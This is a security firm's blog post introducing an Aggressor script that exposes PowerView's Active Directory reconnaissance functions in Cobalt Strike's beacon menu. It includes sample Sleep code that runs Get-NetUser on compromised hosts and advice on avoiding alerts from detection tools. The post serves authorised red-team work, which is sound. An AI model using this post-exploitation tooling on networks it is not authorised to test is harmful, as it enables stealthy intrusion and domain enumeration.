March 22, 2018

Aggressor PowerView

Tevora employs a lot of different tools depending on the need at hand. During penetration tests and red teams, one of the most commonly used is PowerView from PowerSploit. PowerView is an excellent tool for performing reconnaissance in Windows environments and provides a wealth of value. Its functions offer an alternative to native Windows commands that may get flagged by various detection tools. For example, rather than executing net user admin /domain (which would most likely trigger alerts), you could run Get-NetUser -UserName admin, which uses Active Directory Service Interfaces (ADSI) and Lightweight Directory Access Protocol (LDAP) instead. This is a very simple example of what can be done with PowerView, but it highlights some of its usability. In addition to functionality that mirrors native Windows commands, it contains a handful of custom functions that are extremely useful as well.

Another tool commonly used by Tevora's threat team is Cobalt Strike. Cobalt Strike also offers a lot of great features and is a common go-to tool for red teams. One of its best features is Aggressor, the scripting language built into Cobalt Strike, which allows people to extend its functionality for their needs.

Tevora has created an Aggressor script that provides an interface for using PowerView from within Cobalt Strike. Tevora has released this Aggressor script on GitHub, where it can be found here. The script gives end users a GUI interface for all of the functions built into PowerView.

[Image: pv1]

The menu is organized the same way harmj0y organized the PowerView README page.

[Image: pv2]

While interacting with a Cobalt Strike beacon, a user can right click and see all of the PowerView options available. With the number of functions built into PowerView, it is easy to forget what is available to you, which often prompts users to open the .ps1 file and read through the code and options. One of the benefits of this interface is that everything available is visible right away, along with a quick synopsis of each function.

Text boxes in the interface take the values that will be passed to the PowerView function's parameters, while check boxes correspond to the function's switches. Additionally, users can select whether they use PowerPick (Unmanaged PowerShell) or PowerShell to execute their PowerView functions, which gives the end user a little more control over how the command runs.
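As an added illustration of the dialog-to-command mapping just described (example code, not Tevora's released script), here is one PowerView entry wired into the beacon right-click menu with Cobalt Strike's Aggressor dialog API. The function name run_getnetuser and the dialog field names are assumed, and the script assumes PowerView.ps1 has already been imported into the beacon.

```sleep
# Build the PowerView command from the dialog values and run it on each beacon.
# $1 = array of beacon IDs, $2 = dictionary of dialog values.
sub run_getnetuser {
    local('$bid $cmd $user');
    $cmd = "Get-NetUser";
    $user = $2['username'];

    # Text box -> parameter value. Refuse quote characters rather than
    # letting them alter the PowerShell command line.
    if ($user ne "") {
        if ("'" isin $user || '"' isin $user) {
            foreach $bid ($1) { berror($bid, "UserName may not contain quotes"); }
            return;
        }
        $cmd .= " -UserName '" . $user . "'";
    }

    # Check box -> switch parameter (checkbox values arrive as "true"/"false").
    if ($2['spn'] eq "true") {
        $cmd .= " -SPN";
    }

    # Execute with PowerPick (unmanaged PowerShell) or powershell.exe.
    # Assumes PowerView.ps1 was already loaded with powershell-import.
    foreach $bid ($1) {
        if ($2['method'] eq "powerpick") {
            bpowerpick($bid, $cmd);
        } else {
            bpowershell($bid, $cmd);
        }
    }
}

# Beacon right-click menu: PowerView -> Get-NetUser opens the dialog.
popup beacon_bottom {
    menu "PowerView" {
        item "Get-NetUser" {
            local('$dialog');
            $dialog = dialog("Get-NetUser",
                %(username => "", spn => "false", method => "powerpick"),
                lambda({ run_getnetuser($bids, $3); }, $bids => $1));
            drow_text($dialog, "username", "UserName:");
            drow_checkbox($dialog, "spn", "Switches:", "-SPN");
            drow_combobox($dialog, "method", "Execute with:", @("powerpick", "powershell"));
            dbutton_action($dialog, "Run");
            dialog_show($dialog);
        }
    }
}
```

Load it through Cobalt Strike's Script Manager; the released script applies this same pattern to every PowerView function rather than just Get-NetUser.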

PowerView is often used in PowerShell one-liners that chain multiple functions together to retrieve specific data. Unfortunately, in its current state this script does not offer that ability; it simply gives the end user an interface to PowerView and an easy way of remembering all of its functions and their arguments. Note that this script does not automatically perform a powershell-import of PowerView.ps1 within Cobalt Strike, so users should always make sure it has been imported beforehand, or that they are interacting with a beacon where it is already imported.